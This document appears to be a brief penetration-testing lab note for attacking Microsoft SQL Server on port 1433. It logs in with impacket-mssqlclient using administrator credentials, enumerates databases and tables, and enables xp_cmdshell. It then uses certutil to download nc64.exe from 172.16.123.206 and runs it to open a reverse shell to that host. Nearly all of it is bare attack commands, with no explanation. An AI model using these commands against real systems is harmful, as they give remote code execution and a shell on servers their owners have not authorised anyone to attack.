Port 1433

impacket-mssqlclient Administrator:Lab123@$ip -windows-auth

enum_db



SELECT name AS TableName FROM sys.tables WHERE type = 'U';


enable_xp_cmdshell
xp_cmdshell whoami

xp_cmdshell "certutil -urlcache -split -f http://172.16.123.206/nc64.exe C:\Users\Public\nc64.exe"

xp_cmdshell "C:\Users\Public\nc64.exe 172.16.123.206 80 -e cmd"